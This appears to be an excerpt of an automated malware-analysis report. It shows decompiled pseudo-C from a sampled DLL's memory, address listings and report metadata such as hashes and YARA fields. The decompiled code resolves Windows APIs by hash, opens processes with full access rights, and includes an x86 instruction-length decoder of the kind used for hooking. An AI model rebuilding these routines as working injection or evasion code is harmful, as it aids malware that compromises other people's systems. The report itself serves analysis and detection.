									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6EB5C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6EB5F828(_t449 + 0x14, E6EB5F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6EB5F4BC(_t449 + 0x14, E6EB5F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6EB63064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6EB5F828(_t449 + 0x40, E6EB5F4CC(_t449 + 0x3c) + 4);
											 *(E6EB5F4BC(_t449 + 0x40, E6EB5F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6EB5CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6EB5F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6EB5F4BC(_t449 + 0x40, _t431 * 4);
												E6EB58B58( *_t211, E6EB602B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6EB5CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6EB5F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6EB5F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6EB5F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6EB5F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6EB5F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6EB638F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6EB5F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6EB5F828( *(_t449 + 4), E6EB5F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6EB5F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6EB5F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6EB5F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6EB5F4BC(_t322, _t430);
										E6EB638F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6EB5F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6EB5F828(_t322, E6EB5F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6EB5F828( *(_t449 + 4), E6EB5F4CC( *_t449) + 4);
								 *(E6EB5F4BC( *(_t449 + 4), E6EB5F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6EB5F828(_t322, E6EB5F4CC(_t322) + 4);
								 *(E6EB5F4BC(_t322, E6EB5F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6EB5F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6EB63064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6EB5F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6EB5F828( *(_t449 + 4), E6EB5F4CC( *_t449) + 4);
										 *(E6EB5F4BC( *(_t449 + 4), E6EB5F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6EB5F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6EB5F828( *((intOrPtr*)(_t449 + 0x74)), E6EB5F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6EB5F4BC( *((intOrPtr*)(_t449 + 0x74)), E6EB5F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6EB5F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6EB5F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6EB5F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6EB5F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6EB5F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6EB5F4BC(_t430, _t443);
										E6EB638F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6EB5F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6EB5F828(_t430, E6EB5F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6EB63064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6EB5F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6EB5F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6EB5F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6EB5F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6EB5F4BC( *(_t449 + 4), _t445);
										E6EB638F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6EB5F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6EB5F828( *(_t449 + 4), E6EB5F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6EB5F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6eb58435
0x6eb5843b
0x6eb5843f
0x6eb58443
0x6eb5844e
0x6eb58452
0x6eb58457
0x6eb5845f
0x6eb5846f
0x00000000
0x6eb58471
0x6eb58479
0x6eb58480
0x6eb58480
0x6eb589d3
0x6eb589d5
0x6eb58a16
0x6eb58a18
0x6eb58a27
0x6eb58a33
0x6eb58a33
0x6eb58a22
0x6eb58a39
0x6eb58a3e
0x00000000
0x6eb58a3e
0x6eb58a26
0x00000000
0x6eb5848a
0x6eb5848e
0x6eb58491
0x6eb58599
0x6eb58599
0x6eb5859e
0x6eb586c1
0x6eb586c5
0x6eb586ca
0x6eb586ce
0x6eb586d2
0x6eb58808
0x6eb5880a
0x6eb5880e
0x6eb58817
0x6eb58822
0x6eb58826
0x6eb5882f
0x6eb58834
0x6eb5883a
0x6eb5883b
0x6eb5883f
0x6eb58843
0x6eb5884a
0x6eb5884c
0x6eb5898c
0x6eb5899d
0x6eb589a4
0x6eb589ab
0x6eb589ab
0x6eb589ae
0x6eb589b1
0x6eb589b4
0x6eb589ba
0x6eb589c1
0x6eb589c5
0x6eb589ce
0x00000000
0x6eb589ce
0x6eb589bc
0x6eb589bf
0x6eb589d8
0x6eb589f0
0x6eb589f3
0x6eb589f8
0x6eb58a02
0x6eb58a05
0x6eb58a08
0x6eb58a11
0x00000000
0x6eb58a11
0x00000000
0x6eb589bf
0x6eb58854
0x6eb58854
0x6eb58856
0x6eb5885a
0x6eb5885f
0x6eb58861
0x6eb58865
0x6eb58868
0x6eb58870
0x6eb58872
0x00000000
0x00000000
0x6eb58889
0x6eb588a4
0x6eb588a6
0x6eb588b4
0x6eb588b9
0x6eb588bb
0x6eb588d8
0x6eb588d8
0x6eb588dc
0x6eb588de
0x00000000
0x00000000
0x6eb588e0
0x6eb588e3
0x6eb58904
0x6eb58923
0x6eb58929
0x6eb5892c
0x6eb58931
0x6eb58932
0x6eb58939
0x00000000
0x00000000
0x6eb58941
0x6eb58941
0x6eb58943
0x6eb5894f
0x6eb5895b
0x6eb5897d
0x6eb58982
0x6eb58983
0x6eb58983
0x00000000
0x6eb58943
0x00000000
0x6eb588e3
0x6eb588bd
0x6eb588c3
0x6eb588c5
0x6eb588c6
0x6eb588c7
0x6eb588c8
0x6eb588cc
0x6eb588d0
0x6eb588d2
0x6eb588d3
0x6eb588d4
0x6eb588d6
0x00000000
0x00000000
0x00000000
0x6eb588d6
0x6eb588e9
0x00000000
0x6eb588e9
0x6eb586d8
0x6eb586da
0x6eb586dc
0x00000000
0x00000000
0x6eb586e6
0x6eb586e6
0x6eb586e8
0x6eb586eb
0x6eb586ed
0x6eb586f5
0x6eb586fc
0x6eb58700
0x6eb58703
0x00000000
0x00000000
0x6eb587ff
0x6eb58800
0x6eb58802
0x00000000
0x00000000
0x00000000
0x6eb58802
0x6eb58709
0x6eb5870c
0x6eb58715
0x6eb5871a
0x6eb5871c
0x6eb58728
0x6eb5872c
0x6eb58731
0x6eb58735
0x6eb58b12
0x6eb58b26
0x6eb58b48
0x6eb58b4d
0x6eb58b4d
0x6eb5874b
0x6eb58750
0x6eb58754
0x6eb58754
0x6eb58754
0x6eb58754
0x6eb58759
0x6eb5875e
0x6eb58760
0x6eb58764
0x6eb5876b
0x6eb58770
0x6eb58772
0x6eb58ad3
0x6eb58ae2
0x6eb58afb
0x6eb58b00
0x6eb58b00
0x6eb58785
0x6eb5878a
0x6eb5878e
0x6eb5878e
0x6eb5878e
0x6eb587a0
0x6eb587c1
0x6eb587c9
0x6eb587d7
0x6eb587f5
0x6eb587fb
0x6eb587fb
0x00000000
0x6eb5870c
0x6eb585a4
0x6eb585a4
0x6eb585a6
0x6eb585ad
0x6eb585bb
0x6eb585bd
0x6eb585c1
0x6eb585c3
0x6eb585c5
0x6eb58600
0x6eb5860f
0x6eb58611
0x6eb58613
0x6eb58631
0x6eb58633
0x6eb58635
0x6eb58647
0x6eb58665
0x6eb5866e
0x6eb58671
0x6eb5867f
0x6eb58690
0x6eb586ae
0x6eb586b0
0x6eb586b4
0x6eb586b4
0x6eb586b4
0x6eb58635
0x00000000
0x6eb58613
0x6eb585cb
0x6eb585cb
0x6eb585d0
0x6eb585d7
0x6eb585e6
0x6eb585ed
0x6eb585ef
0x00000000
0x00000000
0x6eb585fb
0x6eb585fc
0x6eb585fe
0x00000000
0x00000000
0x00000000
0x6eb585fe
0x6eb585f1
0x6eb585f4
0x00000000
0x00000000
0x6eb586b6
0x6eb586b6
0x6eb586b7
0x6eb586b7
0x00000000
0x6eb58497
0x6eb58497
0x6eb58497
0x6eb58499
0x6eb584a0
0x6eb584ae
0x6eb584b0
0x6eb584b4
0x6eb584b6
0x6eb584e2
0x6eb584e6
0x6eb584eb
0x6eb584f0
0x6eb584f4
0x6eb584f8
0x6eb584ff
0x6eb58504
0x6eb58506
0x6eb58a95
0x6eb58aa4
0x6eb58ac3
0x6eb58ac8
0x6eb58ac8
0x6eb58519
0x6eb5851e
0x6eb58522
0x6eb58522
0x6eb58522
0x6eb58533
0x6eb58535
0x6eb58537
0x6eb58548
0x6eb58548
0x6eb5854d
0x6eb58552
0x6eb58556
0x6eb5855b
0x6eb58562
0x6eb58567
0x6eb58569
0x6eb58a57
0x6eb58a63
0x6eb58a7d
0x6eb58a82
0x6eb58a82
0x6eb5857f
0x6eb58584
0x6eb58588
0x6eb58588
0x6eb58588
0x6eb58588
0x6eb5858b
0x6eb5858b
0x00000000
0x6eb5858b
0x6eb584ba
0x6eb584ba
0x6eb584bc
0x6eb584c8
0x6eb584cf
0x6eb584d1
0x00000000
0x00000000
0x6eb584dd
0x6eb584de
0x6eb584e0
0x00000000
0x00000000
0x00000000
0x6eb584e0
0x6eb584d3
0x6eb584d6
0x00000000
0x00000000
0x6eb5858c
0x6eb58590
0x6eb58591
0x6eb58591
0x00000000
0x6eb58499
0x6eb58491

Strings

, xrefs: 6EB58A1A

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: f00caedde31a58b554aa8d2f1b43dc5172c348471e00e08aff71d27cd204c249
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: B41283716283859FC715EFA4C890AAEBBE9EF85304F104D2DE699873A1DB30DC15CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6EB69370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6EB69370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6EB63698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
